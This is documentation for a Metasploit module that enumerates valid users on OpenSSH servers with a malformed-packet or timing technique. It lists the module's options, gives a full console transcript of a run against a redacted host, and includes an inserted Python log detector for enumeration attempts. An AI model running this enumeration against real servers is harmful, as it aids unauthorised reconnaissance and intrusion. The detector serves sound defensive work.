## Introduction

This module uses a malformed packet or timing attack to enumerate users on
an OpenSSH server.

Testing note: invalid users were logged, while valid users were not. YMMV.
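
The testing note suggests a detection signal for defenders: a wordlist run leaves one `Invalid user` line per miss from the same source, while names that exist leave none. The following is an added example, not part of the module or its documentation. The log lines are constructed, and the function name, `min_users` and `window` thresholds, and the classic syslog line layout are assumptions to adapt to your environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth-log lines for illustration (documentation IP ranges).
# 'bcook' (not found in the page's run) is logged; a valid name would leave no line.
SAMPLE_LOG = """\
Aug 20 19:26:30 bastion sshd[4101]: Invalid user admin from 203.0.113.7 port 50112
Aug 20 19:26:31 bastion sshd[4103]: Invalid user oracle from 203.0.113.7 port 50114
Aug 20 19:26:31 bastion sshd[4105]: Invalid user test from 203.0.113.7 port 50116
Aug 20 19:26:32 bastion sshd[4107]: Invalid user bcook from 203.0.113.7 port 50118
Aug 20 19:26:33 bastion sshd[4109]: Invalid user backup from 203.0.113.7 port 50120
Aug 20 19:31:02 bastion sshd[4190]: Invalid user jsmiht from 198.51.100.23 port 41822
Aug 20 19:31:40 bastion sshd[4194]: Accepted publickey for jsmith from 198.51.100.23 port 41830 ssh2
Aug 20 20:15:09 bastion sshd[4302]: Invalid user jsmiht from 198.51.100.23 port 42001
"""

INVALID_USER = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Invalid user (\S+) from (\S+)"
)

def find_enumeration(log_text, min_users=5, window=timedelta(seconds=60), year=2018):
    """Map source IP -> sorted invalid usernames, for sources that tried at
    least `min_users` distinct unknown usernames within `window`."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = INVALID_USER.match(line)
        if m:
            # Classic syslog timestamps carry no year, so one is supplied.
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            events[m.group(3)].append((ts, m.group(2)))
    flagged = {}
    for src, seen in events.items():
        seen.sort()
        start = 0
        for end in range(len(seen)):
            while seen[end][0] - seen[start][0] > window:
                start += 1  # slide the window forward
            users = {name for _, name in seen[start:end + 1]}
            if len(users) >= min_users:
                flagged.setdefault(src, set()).update(users)
    return {src: sorted(users) for src, users in flagged.items()}

if __name__ == "__main__":
    for src, users in find_enumeration(SAMPLE_LOG).items():
        print(f"{src}: {len(users)} unknown usernames probed: {', '.join(users)}")
```

A single mistyped username repeated from one address (the second source in the sample) stays below the threshold, since only distinct names are counted.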

## Actions

**Malformed Packet**

The default action sends a malformed (corrupted) `SSH_MSG_USERAUTH_REQUEST`
packet using public key authentication (must be enabled) to enumerate users.

**Timing Attack**

On some versions of OpenSSH under some configurations, OpenSSH will return a
"permission denied" error for an invalid user faster than for a valid user,
creating an opportunity for a timing attack to enumerate users.

## Options

**USERNAME**

Single username to test (username spray).

**USER_FILE**

File containing usernames, one per line.

**THRESHOLD**

Number of seconds needed before a user is considered found (timing attack only).

**CHECK_FALSE**

Check for false positives (random username).

## Usage

```
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts [redacted]
rhosts => [redacted]
msf auxiliary(scanner/ssh/ssh_enumusers) > echo $'wvu\nbcook' > users
[*] exec: echo $'wvu\nbcook' > users
msf auxiliary(scanner/ssh/ssh_enumusers) > set user_file users
user_file => users
msf auxiliary(scanner/ssh/ssh_enumusers) > set verbose true
verbose => true
msf auxiliary(scanner/ssh/ssh_enumusers) > run
[*] [redacted]:22 - SSH - Using malformed packet technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'wvu' found
[-] [redacted]:22 - SSH - User 'bcook' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack
action => Timing Attack
msf auxiliary(scanner/ssh/ssh_enumusers) > run
[*] [redacted]:22 - SSH - Using timing attack technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'wvu' found
[-] [redacted]:22 - SSH - User 'bcook' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > creds
Credentials
===========

host        origin      service       public  private  realm  private_type
----        ------      -------       ------  -------  -----  ------------
[redacted]  [redacted]  22/tcp (ssh)  wvu
msf auxiliary(scanner/ssh/ssh_enumusers) >
```